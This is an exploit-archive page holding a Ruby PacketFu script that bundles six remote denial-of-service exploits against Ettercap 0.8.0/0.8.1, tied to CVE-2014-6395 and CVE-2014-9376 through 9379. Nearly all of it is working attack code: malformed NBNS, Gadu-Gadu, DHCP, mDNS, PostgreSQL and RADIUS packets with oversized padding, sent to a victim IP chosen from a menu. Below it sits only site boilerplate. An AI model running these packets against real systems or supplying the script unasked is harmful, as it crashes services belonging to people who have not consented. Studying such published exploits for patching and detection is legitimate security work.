Ettercap 0.8.0 / 0.8.1 Denial Of Service

2014.12.20
Credit: Nick Sampanis
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

#Exploit Title: 6 Remote ettercap Dos exploits to 1 #Date: 19/12/2014 #Exploit Author: Nick Sampanis #Vendor Homepage: http://ettercap.github.io #Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz #Version: 8.0-8.1 #Tested on: Linux #CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379 #Make sure that you have installed packefu and pcaprub require 'packetfu' include PacketFu if ARGV.count < 4 puts "[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface" puts "[-]Use valid mac for your interface, if you dont know"+ " victim's ip address use broadcast" exit end def nbns_header u = UDPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_daddr = ARGV[1] u.ip_saddr = ARGV[0] u.udp_src = 4444 u.udp_dst = 137 u.payload = "\xa0\x2c\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00" u.payload << "\x20\x46\x48\x45\x50\x46\x43\x45\x4c\x45\x48\x46"#name u.payload << "\x43\x45\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43"#name u.payload << "\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00"#name u.payload << "\x00\x20" #type u.payload << "\x00\x01" #class u.payload << "A"*1000 #pad u.recalc u.to_w(ARGV[3]) end def gg_client u = TCPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_saddr = ARGV[0] u.ip_daddr = ARGV[1] u.tcp_src = 3333 u.tcp_dst = 8074 u.payload = "\x15\x00\x00\x00" #gg_type u.payload << "\xe8\x03\x00\x00" #gg_len u.payload << "A"*1000 u.recalc u.to_w(ARGV[3]) end def dhcp_header u = UDPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_daddr = ARGV[0] u.ip_saddr = ARGV[1] u.udp_src = 67 u.udp_dst = 4444 u.payload = "\x02"*236 u.payload << "\x63\x82\x53\x63" u.payload << "\x35" u.payload << "\x00\x05\x00" u.payload << "\x51" u.payload << "\x00" #size u.payload << "A" * 3 #pad u.recalc u.to_w(ARGV[3]) end def mdns_header u = UDPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_daddr = ARGV[1] u.ip_saddr = ARGV[0] u.udp_src = 4444 u.udp_dst = 5353 u.payload = "\x11\x11" #id u.payload << "\x00\x00" #flags u.payload << "\x00\x01" #questions u.payload << "\x00\x00" #answer_rr u.payload << "\x00\x00" #auth_rrs u.payload << "\x00\x00" #additional_rr u.payload << "\x06router\x05local\x00" #name u.payload << "\x00\x01" #type u.payload << "\x00\x01" #class u.recalc u.to_w(ARGV[3]) end def mdns_dos_header u = UDPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_daddr = ARGV[1] u.ip_saddr = ARGV[0] u.udp_src = 4444 u.udp_dst = 5353 u.payload = "\x11\x11" #id u.payload << "\x00\x00" #flags u.payload << "\x00\x01" #questions u.payload << "\x00\x00" #answer_rr u.payload << "\x00\x00" #auth_rrs u.payload << "\x00\x00" #additional_rr u.payload << "\x01" u.payload << "\x00\x01" #type u.payload << "\x00\x01" #class u.payload << "A"*500 u.recalc u.to_w(ARGV[3]) end def pgsql_server u = TCPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_saddr = ARGV[1] u.ip_daddr = ARGV[0] u.tcp_src = 5432 u.tcp_dst = 3333 u.payload = "\x52\x00\x00\x00\x08\x00\x00\x00\x03\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00" u.recalc u.to_w(ARGV[3]) end def pgsql_client u = TCPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_saddr = ARGV[0] u.ip_daddr = ARGV[1] u.tcp_src = 3333 u.tcp_dst = 5432 u.payload = "\x70\x00\x00\x5b\x00\x03\x00\x00\x75\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00" u.recalc u.to_w(ARGV[3]) end def pgsql_client_shell u = TCPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_saddr = ARGV[0] u.ip_daddr = ARGV[1] u.tcp_src = 3333 u.tcp_dst = 5432 u.payload = "\x70" u.payload << "\x00\x00\x03\xe9" #len u.payload << "A"*1000 u.payload << "\x00" u.recalc u.to_w(ARGV[3]) end def radius_header u = UDPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_daddr = ARGV[1] u.ip_saddr = ARGV[0] u.udp_src = 4444 u.udp_dst = 1645 u.payload = "\x01\x01\x00\xff\x00\x01\x00\x00\x00\x00\x00\x00\x20\x46\x48\x00\x50\x46\x43\xff\x01\x00\x48\x46\x01\x00\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00\x00\x20\x00\x01" u.recalc u.to_w(ARGV[3]) end puts "[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis" puts "[+]-1- nbns plugin CVE-2014-9377" puts "[+]-2- gg dissector CVE-2014-9376" puts "[+]-3- dhcp dissector CVE-2014-9376" puts "[+]-4- mdns plugin CVE-2014-9378" puts "[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)" puts "[+]-6- radius dissector CVE-2014-9379" print "choice:" choice = $stdin.gets.chomp().to_i() case choice when 1 puts "[+]Sending nbns packet.." nbns_header when 2 puts "[+]Sending client gg packet.." gg_client when 3 puts "[+]Sending dhcp packet.." dhcp_header when 4 puts "[+]Sending mdns packet.." mdns_header mdns_dos_header when 5 puts "[+]Sending pgsql packet.." pgsql_client pgsql_server pgsql_client_shell when 6 puts "[+]Sending radius packet.." radius_header else puts "[-]Unrecognized command " end

References:

http://cxsecurity.com/issue/WLB-2014120114


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top